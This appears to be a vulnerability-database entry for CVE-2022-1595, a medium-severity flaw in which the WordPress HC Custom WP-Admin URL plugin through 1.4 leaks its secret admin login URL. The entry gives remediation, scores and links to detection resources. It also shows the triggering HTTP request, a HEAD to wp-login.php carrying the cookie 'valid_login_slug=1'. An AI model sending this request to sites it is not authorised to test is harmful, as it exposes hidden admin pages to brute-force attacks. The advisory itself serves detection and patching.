🔙 목록으로 돌아가기

CVE-2022-1595: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure

TitleWordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
Authortheamanrawat,oleveloper
SeverityMedium
ImpactAttackers can obtain the secret custom admin login URL by sending crafted requests with specific cookies, potentially facilitating brute force attacks against the admin panel.
RemediationUpdate to the latest version of WordPress HC Custom WP-Admin URL plugin (>=1.5) to mitigate the vulnerability.
CVSS Score5.3
EPSS Score0.28971
CVE IDCVE-2022-1595
CWE IDCWE-200
Tags cve cve2022 unauth wpscan wordpress wp-plugin wp hc-custom-wp-admin-url vuln

🔍 Vulnerability Description

The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request

🌐 HTTP Request

HEAD /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Cookie: valid_login_slug=1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1595.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1595.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A